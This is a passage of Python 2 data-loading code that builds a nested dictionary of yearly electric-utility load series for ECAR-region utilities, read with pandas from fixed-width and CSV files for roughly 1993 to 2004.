2003 : pd.read_fwf('%s/ecar/2003/BREC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BREC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
7004 : {
1994 : pd.read_fwf('%s/ecar/1994/BPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BPI00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BPI01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BPI02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BPI04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3755 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CEI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3542 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CIN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/CIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/CIN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/CIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/CIN00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/CIN01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/CIN02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/CIN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/CIN04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4254 : {
1993 : pd.read_fwf('%s/ecar/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4922 : {
1993 : pd.read_fwf('%s/ecar/1993/DPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5109 : {
1993 : pd.read_fwf('%s/ecar/1993/DECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DECO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DECO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DECO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DECO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DECO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DECO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DECO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DECO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5487 : {
1993 : pd.read_fwf('%s/ecar/1993/DLCO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DLCO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DLCO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DLCO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DLCO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DLCO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DLCO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DLCO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DLCO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DLCO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DLCO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DLCO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5580 : {
1993 : pd.read_fwf('%s/ecar/1993/EKPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/EKPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/EKPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/EKPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/EKPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/EKPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/EKPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/EKPC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/EKPC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/EKPC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/EKPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/EKPC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9267 : {
1993 : pd.read_fwf('%s/ecar/1993/HEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/HEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/HEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/HEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/HEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/HEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/HEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/HEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/HEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/HEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/HEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/HEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9273 : {
1993 : pd.read_fwf('%s/ecar/1993/IPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/IPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/IPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/IPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/IPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/IPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/IPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/IPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/IPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/IPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/IPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/IPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
10171 : {
1993 : pd.read_fwf('%s/ecar/1993/KUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/KUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/KUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/KUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/KUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
11249 : {
1993 : pd.read_fwf('%s/ecar/1993/LGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/LGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/LGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/LGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/LGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/LGEE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/LGEE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/LGEE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/LGEE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/LGEE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/LGEE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/LGEE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13756 : {
1993 : pd.read_fwf('%s/ecar/1993/NIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/NIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/NIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/NIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/NIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/NIPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/NIPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/NIPS00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
